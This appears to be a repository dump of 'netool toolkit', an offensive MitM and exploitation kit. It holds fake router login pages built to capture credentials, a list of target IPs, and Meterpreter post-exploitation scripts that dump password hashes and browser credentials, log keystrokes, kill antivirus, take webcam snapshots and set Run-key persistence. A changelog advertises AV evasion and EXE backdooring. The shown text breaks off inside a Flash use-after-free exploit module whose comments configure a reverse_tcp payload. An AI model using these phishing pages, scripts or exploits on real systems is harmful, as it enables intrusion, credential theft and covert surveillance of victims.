More HTML here... 447 | */ 448 | function xsltProcessingObject(dataReadyFunc, dataTimeoutFunc, timeoutMillis, dataURL) 449 | { 450 | // This allows anonymous functions called from a different object scope to be 451 | // able to access the variable. 
452 | var copy = this; 453 | 454 | this.platformMoz = (document.implementation && document.implementation.createDocument); 455 | this.platformIE6 = (!this.platformMoz && document.getElementById && window.ActiveXObject); 456 | this.xsltUrl = dataURL; 457 | this.dataReady = dataReadyFunc; 458 | this.retrieveData = xslt_RetrieveData; 459 | this.transform = xslt_Transform; 460 | this.sheetReady = function(xmlDoc) 461 | { 462 | /* 463 | * When the document has finished loading, we first initialize the parser 464 | * (by compiling the stylesheet), and then tell the client that we are ready 465 | * to perform transformations. 466 | */ 467 | copy.initParser(xmlDoc); 468 | copy.dataReady(xmlDoc); // Call the client's callback function 469 | }; 470 | 471 | this.initParser = xslt_InitParser; 472 | this.createEmptyDocument = xslt_createEmptyDocument; 473 | this.data = new xmlDataObject(this.sheetReady, dataTimeoutFunc, timeoutMillis, dataURL); 474 | this.addParameter = xslt_AddParameter; 475 | this.processor = null; 476 | } 477 | 478 | /* 479 | * Compile the stylesheet into an executible form. If this function is called after 480 | * the stylesheet has been compiled, it will be thrown away and recompiled. 481 | */ 482 | function xslt_InitParser(xsltDocument) 483 | { 484 | var doc = xsltDocument.getDocument(); 485 | if (this.platformMoz) { 486 | this.processor = new XSLTProcessor(); 487 | this.processor.importStylesheet(doc); 488 | } else if (this.platformIE6) { 489 | var xslTemplate = xslt_CreateActiveXTemplate(); 490 | if (!xslTemplate) { 491 | throw "No XSLT Support"; 492 | } 493 | xslTemplate.stylesheet = doc; 494 | this.processor = xslTemplate.createProcessor(); 495 | } else { 496 | throw "No XSLT Support"; 497 | } 498 | } 499 | 500 | /* 501 | * xslt_AddParameter() 502 | * Applications to call only in the 'ready' callback. 
503 | */ 504 | function xslt_AddParameter(param_name, param_value) 505 | { 506 | if (this.processor != null) { 507 | if (this.platformMoz) { 508 | this.processor.setParameter(null, param_name, param_value); 509 | } else if (this.platformIE6) { 510 | this.processor.addParameter(param_name, param_value); 511 | } 512 | } 513 | } 514 | 515 | /* 516 | * xmlDataObject_dataTimeoutFunc() 517 | * retry retrieval but will timeout less frequently 518 | */ 519 | function xmlDataObject_dataTimeoutFunc() 520 | { 521 | this.timeoutMillis = this.extendedTimeoutMillis; 522 | this.retrieveData(); 523 | } 524 | 525 | function xslt_RetrieveData() 526 | { 527 | // Pass the retrieval request on to our internal data. 528 | this.data.retrieveData(); 529 | } 530 | 531 | /* 532 | * Check several versions of the MSXML XSLTemplate ActiveX object to see which are 533 | * supported. Return the most current available version, or null if none can be found. 534 | */ 535 | function xslt_CreateActiveXTemplate() 536 | { 537 | try { 538 | return new ActiveXObject("Msxml2.XSLTemplate.4.0"); 539 | } catch (e) {} 540 | try { 541 | return new ActiveXObject("Msxml2.XSLTemplate.3.0"); 542 | } catch (e) {} 543 | try { 544 | return new ActiveXObject("Msxml2.XSLTemplate"); 545 | } catch (e) {} 546 | return null; 547 | } 548 | 549 | /* 550 | * This function performs an XSLT translation. The XSLT stylesheet must already be 551 | * stored inside this xsltProcessingObject; it is an error to call this function 552 | * before being notified, via the callback passed to the constructor, that this 553 | * XSLT object has finished loading. 554 | * The xmlDoc parameter must be an XMLDOMDocument, or equivalent ActiveX object. The 555 | * ownerDocument must be supplied as well, and it must the a top-level document which 556 | * will contain the HTML generated by applying the XSLT. If the target argument is 557 | * present, then it must be a descendant of the ownerDocument as well. 
558 | * The target parameter is optional, and if specified must be a DOM node to which 559 | * all elements generated by the XSLT transformation should be attached. If a target 560 | * is specified, then all nodes are appended to it as if by calls to target.appendChild(), 561 | * and no value is returned. If no target is specified, then this function makes a 562 | * "best effort" attempt to create a parent element for the nodes to live in, and 563 | * returns that node. This creation is not guaranteed to work, because there is no 564 | * single HTML element which can legally contain any other arbitrary HTML element. 565 | * As a rule, this attempted creation will usually work in Firefox, and usually fail 566 | * in Internet Explorer, so use it at your own risk. 567 | */ 568 | function xslt_Transform(xmlDoc, ownerDocument, target) 569 | { 570 | if (this.platformMoz) { 571 | var fragment = this.processor.transformToFragment(xmlDoc, ownerDocument); 572 | if (!target) { 573 | return fragment; 574 | } 575 | target.appendChild(fragment); 576 | return; 577 | 578 | /* 579 | * This section is left here to demonstrate how one could convert Firefox's 580 | * output to a string instead of converting IE's output to a node list. 581 | * It is commented out to keep it from being executed, however. 
582 | */ 583 | /* 584 | var tempHolder = document.createElement("span"); 585 | tempHolder.appendChild(fragment); 586 | return tempHolder.innerHTML; 587 | */ 588 | } else if (this.platformIE6) { 589 | // Try the IE way 590 | this.processor.input = xmlDoc; 591 | this.processor.transform(); 592 | var output = this.processor.output; 593 | 594 | if (target) { 595 | if (output != null && output.length > 0) { 596 | target.innerHTML += output; 597 | } 598 | return; 599 | } 600 | 601 | var result = ownerDocument.createElement('span'); 602 | result.outerHTML = output; 603 | return result; 604 | } 605 | } 606 | 607 | /* 608 | * Create an empty DOM Document using the correct interface for the current browser. 609 | * If no suitable interface for document creation can be found, this function will 610 | * return null. 611 | */ 612 | function xslt_createEmptyDocument() 613 | { 614 | if (this.platformMoz) { 615 | /* 616 | * This is Mozilla (and others) compatible and is the preferred standard for retrieving an XML document. 617 | */ 618 | return document.implementation.createDocument("", "", null); 619 | } 620 | 621 | /* 622 | * Try IE and Opera flavours 623 | */ 624 | try { 625 | return new ActiveXObject("MSXML2.FreeThreadedDOMDocument.4.0"); 626 | } catch (e) {} 627 | try { 628 | return new ActiveXObject("MSXML2.FreeThreadedDOMDocument.3.0"); 629 | } catch (e) {} 630 | try { 631 | return new ActiveXObject("Microsoft.XMLDOM"); 632 | } catch (e) {} 633 | try { 634 | return new ActiveXObject("Msxml2.XMLHTTP"); 635 | } catch (e) {} 636 | try { 637 | return new ActiveXObject("Microsoft.XMLHTTP"); 638 | } catch (e) {} 639 | try { 640 | return new XMLHttpRequest(); 641 | } catch (e) {} 642 | return null; 643 | } 644 | 645 | function xml_data_js_loaded() { return true; } 646 | 647 | /* 648 | * We must check for XPath implementation; some browsers support it but do not 649 | * enable it by default. This code activates it if it exists. 
(This code is written 650 | * in the global scope so that it executes as the page loads). 651 | */ 652 | if ((typeof document.implementation == "object") && (typeof document.implementation.hasFeature == "function")) { 653 | if (document.implementation.hasFeature("XPath", "3.0")) { 654 | // Opera does not have XMLDocument 655 | if (typeof(XMLDocument) == "undefined") { 656 | XMLDocument = Document; 657 | } 658 | // prototying the XMLDocument 659 | XMLDocument.prototype.selectNodes = function(cXPathString, xNode) { 660 | if(!xNode) { 661 | xNode = this; 662 | } 663 | var oNSResolver = this.createNSResolver(this.documentElement); 664 | var aItems = this.evaluate(cXPathString, xNode, oNSResolver, XPathResult.ORDERED_NODE_SNAPSHOT_TYPE, null); 665 | var aResult = []; 666 | for (var i = 0; i < aItems.snapshotLength; i++) { 667 | aResult[i] = aItems.snapshotItem(i); 668 | } 669 | return aResult; 670 | } 671 | 672 | // prototying the Element 673 | Element.prototype.selectNodes = function(cXPathString) { 674 | if (this.ownerDocument.selectNodes) { 675 | return this.ownerDocument.selectNodes(cXPathString, this); 676 | } else { 677 | throw "For XML Elements Only"; 678 | } 679 | } 680 | } 681 | } 682 | -------------------------------------------------------------------------------- /files/Login_files/banner_left.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/files/Login_files/banner_left.gif -------------------------------------------------------------------------------- /files/Login_files/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Thomson Gateway - Login 5 | 6 | 7 | 8 | 9 | 13 | 14 | 305 | 306 | 307 | 308 | 342 | 343 | 344 | 345 | 412 | 413 |
309 | 310 | 311 | 339 | 340 | 341 |
346 | 347 | 348 | 409 | 410 |
349 | 350 | 351 | 406 | 407 |
352 |
353 |
354 |
355 | 356 | 357 |
Login ! 358 |
Login
359 |

Introduza o seu nome de utlizador e a sua password para aceder ao Thomson Gateway

360 | 361 | 362 |
363 | 364 | 365 | 366 | 367 | 368 | 390 |
369 | 370 | 371 | 372 | 373 | 374 | 375 | 376 | 377 | 378 | 379 | 380 | 381 | 382 | 383 | 387 | 388 |
Nome de utilizador:
Password:
384 | 385 | 386 |
389 |
391 |
392 |
393 |
394 |
395 | 396 | 403 | 404 |
405 |
408 |
411 |
414 | 415 | 416 | 417 | -------------------------------------------------------------------------------- /files/Login_files/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 404 not found 4 | 5 | 6 | 7 | 8 | 9 |


we're sorry, but something went wrong. 10 | 11 |
'Please clear cache (cookies) and re-open your browser to access network'
12 |
13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /files/Login_files/spacer.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/files/Login_files/spacer.gif -------------------------------------------------------------------------------- /files/Login_files/styles.css: -------------------------------------------------------------------------------- 1 | body { COLOR: #000000; TEXT-ALIGN: left; FONT-SIZE: 0.7em; FONT-WEIGHT: normal; FONT-STYLE: normal; TEXT-DECORATION: none; } 2 | body, th, td, tr, div, span { FONT-FAMILY: Verdana,Arial, Helvetica, sans-serif; } 3 | h1 { COLOR: #731472; FONT-SIZE: 1.5em; FONT-WEIGHT: bold; } 4 | em { font-weight: bold; font-style: normal; } 5 | a img { border: none; } 6 | ul {list-style-type:square;margin:0px;padding-left:16px;} 7 | .tableIcon {margin-right:4px;} 8 | 9 | .Menu { background-color: #FFFFFF;border: 1px solid #C6C2CD;margin-bottom:0em; } 10 | .MenuVBar { background-color: #FFFFFF; text-decoration: none; } 11 | 12 | .Menu1Item, .Menu1ItemOver { padding:0em 0.7em 0em 0.7em; background: url(/images/gradient.gif); text-align: left;} 13 | .Menu1ItemSymbol { vertical-align:middle; background: url(/images/gradient.gif); text-align: left;padding:0em 0em 0em 0.7em;} 14 | .Menu1Item a { font-size: 1.2em; color: black; text-decoration: none; font-weight: normal;text-align: left;} 15 | .Menu1ItemOver a { font-size: 1.2em; color: black; text-decoration: none;font-weight: normal;} 16 | .Menu1Item a:hover, .Menu1ItemOver a:hover { font-size: 1.2em; color: black; font-weight: normal; text-decoration: none;text-align:left;} 17 | 18 | .Menu2Item, .Menu2ItemOver { padding:0.5em 0.7em 0.5em 0.5em;background-color: #FFFFFF; text-align: left;} 19 | .Menu2Item a { font-size: 1em; color: black; text-decoration: none; } 20 | .Menu2ItemOver a { font-size: 1em; 
color: #7962AA; font-weight: normal;color:#7962AA; text-decoration: none; } 21 | .Menu2Item a:hover, .Menu2ItemOver a:hover { font-size: 1em; color: #731472; text-decoration: underline; } 22 | 23 | .PageMessage { background-color: #FFF; font-size: 1.1em; font-weight: bold;border: 1px solid #C6C2CD;margin-top:10px } 24 | .PageMessage td {padding: 2px} 25 | .PageMessage img {margin-top: 1px} 26 | 27 | .Table_Title { font-size: 1em; COLOR: white; background-color: #999999; FONT-WEIGHT: bold; } 28 | .Table_InfoBar { font-size: 1em; COLOR: white; background-color: #999999; } 29 | .Table_InfoBarWarning { font-size: 1em; COLOR: red; background-color: #999999; } 30 | .Table_DataLabel { font-size: 1em; background-color: #EDEDED; COLOR: #7962AA; FONT-WEIGHT: bold; } 31 | .Table_DataValue { font-size: 1em; background-color: #EDEDED; COLOR: #7962AA; FONT-WEIGHT: normal; } 32 | .Table_DataValue_Selected { font-size: 1em; background-color: #EDEDED; COLOR: #7962AA; FONT-WEIGHT: normal; } 33 | 34 | .Tab_Inactive a,.Tab_Active a {text-decoration:none;color:white} 35 | .Tab_Inactive { font-size: 1.1em; COLOR: #7962AA; background-color: #999999; FONT-WEIGHT: bold; } 36 | .Tab_Active { font-size: 1.1em; COLOR: white; background-color: #731472; FONT-WEIGHT: bold; } 37 | 38 | .Panel_ButtonBar { background-color: white; COLOR: #FFFFFF; FONT-WEIGHT: bold; } 39 | .Panel_ButtonBar_Button { background-color: #CCCCCC; COLOR: #333333; FONT-WEIGHT: bold; TEXT-ALIGN: center; } 40 | .Panel_ButtonBar_Button:Hover { background-color: #CCCCCC; COLOR: #731472; FONT-WEIGHT: bold; TEXT-ALIGN: center; } 41 | 42 | .Form_Title { font-size: 1em; background-color: #CCCCCC; COLOR: #7962AA; FONT-WEIGHT: bold; } 43 | .Form_DataLabel { font-size: 1em; } 44 | .Form_InputText { width: 175pt; COLOR: #000000; } 45 | .Form_InputPassword { width: 175pt; COLOR: #000000; } 46 | .Form_InputSelect { width: 175pt; COLOR: #000000; } 47 | .Form_InputSelect_Wide { width: 250pt; COLOR: #000000; } 48 | 49 | .wizardGrpToolbar { 
font-size: 12px; font-weight: bold; background-color: #ffffff;} 50 | .wizardGrpTitle { font-size: 12px; font-weight: bold; color: #7962AA ; } 51 | .wizardGrpTxt { font-size: 11px; font-weight: normal; color: #807F83; } 52 | 53 | .wizardCentralPanel { font-size: 11px; font-weight: normal; color: #000000; background-color: #ffffff; } 54 | .wizardVarAlias { font-size: 11px; font-weight: normal; color: #000000; } 55 | .wizardVarDesc { font-size: 11px; font-weight: normal; color: #000000; } 56 | .wizardVarError { font-size: 11px; font-weight: bold; color: #FF0000; } 57 | 58 | .wizardFrontCompletePanel { font-size: 11px; color: #000000; background-color: #ffffff; } 59 | 60 | .wizardSummaryText { font-family: Fixedsys, Courier New, Courier ; font-size: 1em; font-weight: normal; color: #000000; text-align:left; background-color: #ffffff; } 61 | .wizardFooterPanel { font-size: 11px; font-weight: normal; color: #000000; background-color: #ffffff; } 62 | .wizardFooterPanelButton { font-size: 11px; font-weight: normal; color: #000000; background-color: #ffffff; cursor: default; } 63 | 64 | .panelTitle { background-color: #731472; COLOR: #ffffff; FONT-SIZE: 12px; FONT-WEIGHT: bold; } 65 | .panelDelimiter { background-color: #999999; COLOR: #ffffff; FONT-SIZE: 12px; } 66 | .panelToolbar { background-color: #CC9933; COLOR: #FFFFFF; FONT-SIZE: 12px; FONT-WEIGHT: bold; TEXT-ALIGN: center; } 67 | .panelLine { background-color: #999999; COLOR: #ffffff; } 68 | .panelButton { COLOR: #FFFFFF; FONT-SIZE: 12px; FONT-WEIGHT: bold; TEXT-DECORATION: underline; } 69 | .panelButtonSelected { COLOR: #FFFFFF; FONT-SIZE: 12px; FONT-WEIGHT: bold; TEXT-DECORATION: underline; } 70 | 71 | .error { FONT-WEIGHT: bold; COLOR: #993333; } 72 | .margin { MARGIN-LEFT: 5px; MARGIN-RIGHT: 5px; } 73 | .warning { FONT-SIZE: 1.1em; COLOR: #993333; LINE-HEIGHT: normal; } 74 | .nogo { COLOR: white; background-color: #999999; } 75 | 76 | .banner {padding: 0px;background:url(/images/banner_back.gif) repeat-x top 
left;font: normal 10pt verdana;} 77 | .product {color:#FFFFFF ;font: bold 14pt verdana;text-align:left;margin-left: 15px;} 78 | .nopadtable td{padding: 0px;} 79 | 80 | .displaySettings {color:white;margin: 0px 0px 0px 15px;} 81 | .displaySettings a, .pageSettings a:visited {font-weight:normal;color: white;} 82 | 83 | .login {color:black;vertical-align:bottom;text-align:right;padding:0px 10px 5px 0px;background:url(/images/banner_right.gif) no-repeat top right; } 84 | .login a, .login a:visited {font-weight:normal;color: black;} 85 | 86 | .langSelect a:hover,.login a:hover { color: #C9CACC } 87 | .langSelect form { display: inline;} 88 | .black { background-color: #000000; } 89 | form {margin:0px;} 90 | 91 | .NavBar, .NavBar a, .NavBar a:visited { font-size: 1em; font-weight: bold; color: #807F83; } 92 | .NavBar a:hover { font-size: 1em; font-weight: bold; color: #7962AA; } 93 | 94 | .contentcontainer { margin: 5px 0px 5px 0px;} 95 | .contentcontainer a:link, .contentcontainer a:visited { color: #807F83;} 96 | .contentcontainer a:hover { color: #7962AA; } 97 | .contentcontainer hr {visibility:hidden;} 98 | .contentitem {border: 1px solid #C6C2CD;padding:10px;background: url(images/gradient.gif) repeat-x bottom; text-align: left;} 99 | 100 | .homeitemdescr { font-size: 1.1em; } 101 | .homeline a:hover { font-weight: bold; color:#7962AA; } 102 | .homeline a:link,.homeline a:visited,.homeline a:active { font-weight: bold; color:#807F83;} 103 | 104 | .itemtitle { color: #731472; font-size: 1.6em; font-weight: bold; } 105 | 106 | .blocktitle { font-size: 1.2em; color: #000000; font-weight: bold; } 107 | .blocktitle a:hover { font-weight: bold; color:#731472} 108 | .blocktitle a:link,.blocktitle a:visited,.blocktitle a:active { font-weight: bold; color:#731472} 109 | 110 | .hwintftable img { display: block; } 111 | .hwintftable a:hover { font-weight: bold; color:#7962AA; } 112 | .hwintftable a:link,.hwintftable a:visited,.hwintftable a:active { font-weight: bold; 
color:#807F83;} 113 | 114 | .edittable td { padding-left: 4px; padding-right: 4px; } 115 | .edittable th { background-color: #FFFFFF; padding-left: 4px; padding-right: 4px; } 116 | .edittable .oddrow { background-color: #CECECE; } 117 | .edittable .evenrow { background-color: #EFEFEF; } 118 | 119 | .task { font-size: 1.1em;padding:0px 0px 5px 10px;} 120 | .task a:link,.task a:visited,.task a:active { color:#807F83; } 121 | .task a:hover { color:#731472;} 122 | -------------------------------------------------------------------------------- /files/Login_files/user__xl.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/files/Login_files/user__xl.gif -------------------------------------------------------------------------------- /files/ROUTERS_DEFAULT/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | G4tW41 4 | 5 | 22 | 23 | 24 | 42 | 43 | 44 | 45 | 46 |

47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 |
 
 
56 | Authentication Required  57 |

58 | The server http://G4tW41:80 requires a username 59 |
60 | and password. The server says: DT 845W 61 |

62 |

Username:
Password:
 
 
86 | 87 | 88 | -------------------------------------------------------------------------------- /files/ROUTERS_DEFAULT/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 404 not found 4 | 5 | 6 | 7 | 8 | 9 |


we're sorry, but something went wrong. 10 | 11 |
'Please clear cache (cookies) and re-open your browser to access network'
12 |
13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /files/eu.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/files/eu.jpg -------------------------------------------------------------------------------- /files/javaBanner.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/files/javaBanner.jpg -------------------------------------------------------------------------------- /files/list.txt: -------------------------------------------------------------------------------- 1 | 192.168.1.1 2 | 192.168.1.254 3 | 174.120.2.189 4 | 222.137.2.20 5 | 68.236.211.63 6 | -------------------------------------------------------------------------------- /files/post-modules.txt: -------------------------------------------------------------------------------- 1 | ###################################################################### 2 | # This file contains several post-exploitation modules that can be # 3 | # used to configure 'opensource/modules/post-auto.rc'. That resource # 4 | # file is called when the HANDLER receives the remote connection # 5 | # (meterpreter session open), and it automatically launches all post # 6 | # exploitation modules or commands written in it (one per line). 
# 7 | ###################################################################### 8 | 9 | 10 | 11 | # multiple OS post modules 12 | # ------------------------ 13 | run post/multi/gather/env 14 | run post/multi/gather/ssh_creds 15 | run post/multi/gather/firefox_creds 16 | run post/multi/gather/skype_enum 17 | 18 | 19 | # Windows post modules 20 | # -------------------- 21 | run post/windows/gather/checkvm 22 | run post/windows/manage/migrate 23 | run post/windows/gather/hashdump 24 | run post/windows/gather/dumplinks 25 | run post/windows/gather/enum_snmp 26 | run post/windows/gather/enum_shares 27 | run post/windows/gather/arp_scanner 28 | run post/windows/gather/usb_history 29 | run post/windows/capture/keylog_recorder 30 | run post/windows/gather/enum_applications 31 | run post/windows/gather/credential_collector 32 | run post/windows/gather/enum_logged_on_users 33 | 34 | 35 | # Linux post modules 36 | # ------------------ 37 | run post/linux/gather/checkvm 38 | run post/linux/gather/enum_system 39 | run post/linux/gather/enum_configs 40 | run post/linux/gather/enum_network 41 | run post/linux/gather/enum_protections 42 | run post/linux/gather/enum_users_history 43 | 44 | 45 | # mac OSX post modules 46 | # -------------------- 47 | run post/osx/admin/say 48 | run post/osx/gather/enum_osx 49 | 50 | 51 | # meterpreter core commands 52 | # ------------------------- 53 | killav 54 | run migrate -n wininit.exe 55 | screenshot -v -p /home/pedr0/hello.jpeg -v true 56 | 57 | 58 | # Persiste 'meterpreter powershell.bat attack' 59 | # -------------------------------------------- 60 | sysinfo 61 | run migrate -n wininit.exe 62 | upload /var/www/powershell.bat C:\\Windows\\System32\\powershell.bat 63 | upload /var/www/hidden.vbs C:\\Windows\\System32\\hidden.vbs 64 | reg setval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -v persistence -d 'C:\Windows\System32\hidden.vbs' 65 | reg enumkey -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 66 | 67 | 68 | # 
diferent postauto.rc configuration (windows) 69 | # -------------------------------------------- 70 | sysinfo 71 | getuid 72 | getpid 73 | lpwd 74 | pwd 75 | ps 76 | idletime 77 | run migrate -n explorer.exe 78 | run post/windows/gather/hashdump 79 | run post/windows/gather/enum_applications 80 | run post/windows/gather/credential_collector 81 | run post/multi/gather/firefox_creds 82 | search -f *.doc 83 | show_mount 84 | netstat 85 | webcam_snap -i 1 -p /home/pedr0/opensource/logs/targetcam.jpeg -v true 86 | 87 | 88 | # Resource File + ERB scripting in post-exploitation 89 | # -------------------------------------------------- 90 | 91 | chipTech = client.fs.file.expand_path("%NUMBER_OF_PROCESSORS%") 92 | print_good("Thanks mr pedro ubuntu for ERB scripting in post-exploitation") 93 | print_good("target ip:#{host.address} N of processors:#{chipTech}") 94 | 95 | 96 | sysinfo 97 | run migrate -n wininit.exe 98 | screenshot -v -p /root/hacked-CVE-2014-0515.jpeg -v true 99 | run post/windows/gather/enum_applications 100 | reg enumkey -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 101 | reg enumkey -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System 102 | 103 | 104 | -------------------------------------------------------------------------------- /license: -------------------------------------------------------------------------------- 1 | 2 | , , 3 | / \ 4 | ((__-^^-,-^^-__)) 5 | '-_---' ---_-' 6 | '--|o' 'o|--' 7 | \ ' / 8 | ): :( 9 | :o_o: 10 | "-" GNU PUBLIC LICENSE (GPL) 11 | Copyright © 2015 - License - Terms of Use 12 | Everyone is permitted to copy and distribute verbatim copies 13 | of this license document, but changing it is not allowed. 
14 | 15 | --- 16 | -- 1) You are not required to accept this License since you have not 17 | -- signed it, However nothing else grants you permission to modify or 18 | -- distribute the Program or its derivative works under another author 19 | -- name besides 'pedr0 ubuntu - r00t-3xp10it' or change the software 20 | -- name from 'netool toolkit', Therefore by modifying or distributing 21 | -- the Program you indicate your acceptance of this License. 22 | -- 23 | -- 2) You can use this software and distribute it with anyone else 24 | -- as long as you do this for free and keep author credits, also the 25 | -- license must be included into the program without any changes made. 26 | -- However you are allowed to reverse engineer it and distribute it 27 | -- under this terms and conditions. 28 | -- 29 | -- 3) This project can only be distributed in open source format 30 | -- and any adjustments to the source code to spy or control user 31 | -- activity will not be allowed by third part companies/persons. 32 | -- 33 | -- 4) You assume full responsibility for any unlawful actions taken 34 | -- by using this software againts hosts in a local lan or wan networks 35 | -- without owner previous consent, However you are allowed to protect 36 | -- yourselfe from any intruder by any meens necessary. 37 | -- 38 | -- 5) This software uses licenced frameworks develop by others 39 | -- and by any meens infringe that licenses by automating then. 40 | -- But offcourse that all the credits goes go: 41 | -- Fyodor (nmap) | Alor & Naga (ettercap) | HD Moore (metasploit) 42 | -- Moxie M (sslstrip) | Chris L (driftnet) | j0rgan (cupp.py) 43 | -- ReL1K (unicorn.py) | Cleiton P (inurlbr.php) | KyRecon (shellter) 44 | -- Chris Tyler (zenity) and Rob McCool (apache). 45 | -- Assuming that you allready have this programs installed then you 46 | -- have allready acept there's terms and conditions. 
47 | --- 48 | 49 | Copyright © 2015 - netool toolkit 50 | -------------------------------------------------------------------------------- /logs/.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/logs/.log -------------------------------------------------------------------------------- /modules/Intro.nt: -------------------------------------------------------------------------------- 1 | 2 | NETOOL TOOLKIT 4.6 STABLE CHANGELOG 3 | 'MITM PENTESTING OPENSOURCE TOOLKIT' 4 | CODENAME: SINGLE_BYTE_XOR 5 | 6 | The toolkit is named 'Single_byte_XOR' because this version focuses 7 | on obfuscating payloads with the inclusion of Shellter PE injector and 8 | different msf encoders with different interactions to evade AV detection 9 | (windows binaries). The tool also ships with the new automated exploit 10 | 'web_delivery', which executes the 2º stage in RAM without touching disk. 
11 | 12 | we now have 5 modules that trys to evade AV detection (windows): 13 | 2 - Backdooring EXE Files -> bdf_backdoor module 14 | 4 - Meterpreter (ReL1K) -> powershell payload 15 | 5 - Web_delivery (PSH/PYTHON) -> powershell or python 16 | 27 - Generate shellcode -> c-to-exe -> veil-evasion 17 | 29 - Shellter PE infector -> inject shellcode into windows binaries 18 | 19 | ☆ ☆ ☆ ☆ ☆ 20 | 21 | 22 | [ Upgraded ] 23 | msfcli replaced by msfconsole 24 | 25 | [ Bugs Fixed ] 26 | ettercap IPV6 bug -> incorrect target selection /// /// 27 | host-a-file -> phishing webpages displays under MitM 28 | 29 | [ New Modules ] 30 | MitM ROUTER phishing -> capture router credentials 31 | unicorn.py -> HTA drive-by URL payload execution 32 | java.jar phishing -> Drive-by URL payload execution 33 | adobe_flash_hacking_team_uaf -> exploit + mitm + dns_spoof 34 | web_delivery msf module -> python or powershell payloads 35 | Shellter PE injector (by kyREcon) binaries windows obfuscator 36 | 37 | [ Improved ] 38 | netool toolkit Gnu Public License (GPL) display 39 | build shortcut to toolkit -> gnome-desktop-item-edit 40 | file-selection GUI to ettercap -> zenity displays added 41 | host-a-file attack -> zenity file-selection GUI added 42 | windows payloads encoding (diferent msf encoders/interactions) 43 | 44 | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- 45 | HOME PROJECT: http://sourceforge.net/projects/netoolsh/?source=directory 46 | REPORT BUGS: https://sourceforge.net/p/netoolsh/discussion/general/thread 47 | MY WIKI: http://sourceforge.net/p/netoolsh/wiki/netool.sh%20script%20project 48 | VIDEO: https://www.youtube.com/playlist?list=PL6lei9H-Ej0KoXxkxWgNC6C30Sv8QaHUC 49 | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- 50 | 51 | ☠ ☠ ☠ ☠ ☠ 
52 | Special Thanks to: 'istvan, igor, milton' 53 | for all the help provided in testing/debugging modules in this new version 54 | @Suspicious Shell Activity Labs @r00tsector @inurlbr @En0x-Sec_Lab @dwebcrew 55 | Copyright © 2015 - netool toolkit 56 | -------------------------------------------------------------------------------- /modules/Post-auto.rc: -------------------------------------------------------------------------------- 1 | sysinfo 2 | idletime 3 | lpwd 4 | screenshot -v -p /root/netool-hacked.jpeg -v true 5 | run post/multi/gather/env 6 | run post/multi/gather/firefox_creds 7 | -------------------------------------------------------------------------------- /modules/adobe_flash_hacking_team_uaf.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | # 5 | # metasploit-framework/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb 6 | # /usr/share/metasploit-framework/data/exploits# mkdir CVE-2015-5119 7 | # /usr/share/metasploit-framework/data/exploits# cp /root/Downloads/msf.swf ./CVE-2015-5119/ 8 | # 9 | # use exploit/multi/browser/adobe_flash_hacking_team_uaf 10 | # set payload windows/meterpreter/reverse_tcp 11 | # set LHOST 10.0.0.134; LPORT 8443; URIPATH /adobesupport 12 | # exploit 13 | ## 14 | 15 | require 'msf/core' 16 | 17 | class Metasploit3 < Msf::Exploit::Remote 18 | Rank = GreatRanking 19 | 20 | include Msf::Exploit::Remote::BrowserExploitServer 21 | 22 | def initialize(info={}) 23 | super(update_info(info, 24 | 'Name' => 'Adobe Flash Player ByteArray Use After Free', 25 | 'Description' => %q{ 26 | This module exploits an use after free on Adobe Flash Player. The vulnerability, 27 | discovered by Hacking Team and made public as part of the July 2015 data leak, was 28 | described as an Use After Free while handling ByteArray objects. 
This module has 29 | been tested successfully on: 30 | 31 | Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, 32 | Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, 33 | Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194, 34 | Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and 35 | Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. 36 | }, 37 | 'License' => MSF_LICENSE, 38 | 'Author' => 39 | [ 40 | 'Unknown', # Someone from HackingTeam 41 | 'juan vazquez', # msf module 42 | 'sinn3r' # msf module 43 | ], 44 | 'References' => 45 | [ 46 | ['CVE', '2015-5119'], 47 | ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-03.html'], 48 | ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'], 49 | ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816'] 50 | ], 51 | 'Payload' => 52 | { 53 | 'DisableNops' => true 54 | }, 55 | 'Platform' => ['win', 'linux'], 56 